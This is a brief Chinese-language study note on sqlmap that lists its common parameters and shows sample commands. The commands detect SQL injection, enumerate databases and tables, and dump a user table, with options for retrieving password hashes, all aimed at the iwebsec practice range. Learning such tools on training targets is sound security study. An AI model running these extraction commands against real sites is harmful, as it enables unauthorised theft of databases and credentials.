sqlmap的主要功能是:自动检测、利用SQL注入漏洞和对数据库执行相应地攻击
常用参数:
对目标:
- --u 指定url,检测注入点
- --cookie cookie注入
- -D 指定数据库
- -T 指定表
- -C 指定字段
对脱库:
- --dbs 获取数据库
- --tables 获取表
- --columns 获取字段
- --schema 字段类型
- --dump 获取数据
对其他:
- --batch 不再询问确认
- --level=5 测试等级(1-5)
- --risk=3 风险等级(0-3)
对账号:
- --user 获取用户
- --passwords 获取密码(哈希值)
eg:拿在线网站iwebsec 靶场漏洞库中SQL注入漏洞第一关数字型注入举例
(由于我使用的版本是用python脚本写的,因此需用python跑)
- 获取数据库:
python sqlmap.py -u http://www.iwebsec.com:81/sqli/01.php?id=1 --dbs --batch
- 显示所有表名:
python sqlmap.py -u http://www.iwebsec.com:81/sqli/01.php?id=1 -D iwebsec --tables
-
显示表所有信息:
python sqlmap.py -u http://www.iwebsec.com:81/sqli/01.php?id=1 -T user --dump